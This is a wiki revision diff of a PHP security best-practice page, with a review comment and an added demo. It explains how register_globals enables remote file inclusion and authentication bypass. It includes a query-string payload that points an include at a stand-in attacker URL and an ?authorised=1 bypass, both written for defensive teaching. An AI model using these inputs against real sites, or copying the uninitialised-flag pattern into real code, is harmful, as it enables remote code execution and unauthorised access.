Difference between revisions of "PHP Security Leading Practice"
(New page: ===Global Variables=== One does not need to explicitly create "global variables" this is done via the php.ini file by setting the "register_globals" function on. Appending global variable...)
(→Global Variables)
| Line 1: | Line 1: | ||
===Global Variables=== | ===Global Variables=== | ||
| − | One does not need to explicitly create "global variables" this is done via the php.ini file by setting the "register_globals" function on. | + | One does not need to explicitly create "global variables" this is done via the php.ini file by setting the "register_globals" function on. register_globals has been disabled by default since PHP 4.1.0 |
| − | Appending global variables to the URL may be a way to circumvent authentication. | + | |
| + | Include directives in PHP can be vulnerable if register_globals is enabled. | ||
| + | |||
| + | <?PHP | ||
| + | |||
| + | include "$dir/script/dostuff.php"; | ||
| + | |||
| + | ?> | ||
| + | |||
| + | With register_globals enabled the $dir variable can be passed in via the query string: | ||
| + | |||
| + | ?dir=http://www.haxor.com/gimmeeverything.php | ||
| + | |||
| + | This would result in the $dir being set to: | ||
| + | <?PHP | ||
| + | |||
| + | include "http://www.haxor.com/gimmeeverything.php"; | ||
| + | |||
| + | ?> | ||
| + | |||
| + | Appending global variables to the URL may be a way to circumvent authentication: | ||
| + | |||
| + | <?PHP | ||
| + | if(authenticated_user()) | ||
| + | { | ||
| + | $authorised=true; | ||
| + | } | ||
| + | |||
| + | if($authorised) | ||
| + | { | ||
| + | give_family_jewels() | ||
| + | } | ||
| + | |||
| + | ?> | ||
| + | |||
| + | if this page was requested with register_globals enabled using the following parameter ?authorised=1 in the query string the athentication functionalotu assuems the used is authorised to proceed. | ||
| + | Without register_globals enabled the variable $authorised would not be affected by the $authorised=1 parameter. | ||
===Error handling=== | ===Error handling=== | ||
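Review bot: in the added authorisation snippet, $authorised is never given a default before the `if($authorised)` test, which is exactly what lets a request parameter of the same name pre-set it; suggest adding `$authorised=false;` ahead of the `if(authenticated_user())` block so the check fails closed whether or not register_globals is on, and saying so in the explanatory paragraph. Two smaller points in the same hunk: `give_family_jewels()` is missing its trailing semicolon, and the closing sentence has typos ("athentication functionalotu assuems the used" should read "authentication functionality assumes the user") and calls the query parameter `$authorised=1` where the text elsewhere writes `?authorised=1`.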
Revision as of 17:50, 23 October 2007
Global Variables
One does not need to explicitly create "global variables": this is done via the php.ini file by turning the "register_globals" directive on. register_globals has been disabled by default since PHP 4.1.0.
Include directives in PHP can be vulnerable if register_globals is enabled.
<?PHP include "$dir/script/dostuff.php"; ?>
With register_globals enabled, the $dir variable can be supplied by anyone via the query string:
?dir=http://www.haxor.com/gimmeeverything.php
This would result in $dir being set to that URL, so the include becomes:
<?PHP include "http://www.haxor.com/gimmeeverything.php"; ?>
Appending global variables to the URL may be a way to circumvent authentication:
<?PHP
if(authenticated_user())
{
    $authorised=true;
}

// $authorised is only ever assigned on the success path and has no default,
// so anything that pre-populates it (register_globals) makes this test pass.
if($authorised)
{
    give_family_jewels();
}
?>
If this page was requested with register_globals enabled and the parameter ?authorised=1 in the query string, the authentication functionality assumes the user is authorised to proceed. Without register_globals enabled, the variable $authorised would not be affected by the ?authorised=1 parameter.
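The authorisation check above, written in its vulnerable form beside a hardened form, as an added example that is not part of the OWASP page. authenticated_user() and give_family_jewels() are hypothetical stubs, the request is a constructed $_GET array, and extract($_GET) stands in for register_globals on a modern runtime where that directive no longer exists.

```php
<?php
// Constructed sample request: the attacker-controlled ?authorised=1 from the text.
$_GET = ['authorised' => '1'];

// Hypothetical helpers: this request is NOT logged in, so a correct check must deny.
function authenticated_user(): bool { return false; }
function give_family_jewels(): string { return 'secret'; }

// Vulnerable form (the page's pattern): $authorised has no default and is only
// assigned on success, so a pre-populated variable of that name passes the test.
function vulnerable(): string {
    extract($_GET, EXTR_OVERWRITE);   // emulates register_globals=On
    if (authenticated_user()) {
        $authorised = true;
    }
    if ($authorised) {                // set from the query string, not by the check
        return give_family_jewels();
    }
    return 'denied';
}

// Hardened form: refuse to run under register_globals at all, never import
// request data into the local scope, and initialise the flag before it is tested.
function hardened(): string {
    if (ini_get('register_globals')) {
        // Fail closed on an unsafe configuration rather than trust the check.
        return 'denied: register_globals must be Off';
    }
    $authorised = false;              // explicit default; cannot be pre-set
    if (authenticated_user()) {
        $authorised = true;
    }
    return $authorised ? give_family_jewels() : 'denied';
}

echo "vulnerable(): " . vulnerable() . "\n";
echo "hardened():   " . hardened() . "\n";
```

Run it with any PHP 7 or 8 CLI: the vulnerable function hands out the secret to an unauthenticated request while the hardened one denies it.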
Error handling
If possible, check whether error reporting has been turned off via php.ini, i.e. whether "error_reporting" is off.
File Manipulation
Good Things to Use
strip_tags(): Removes any HTML from a string.
nl2br(): Converts new line characters to HTML break "br".
htmlspecialchars():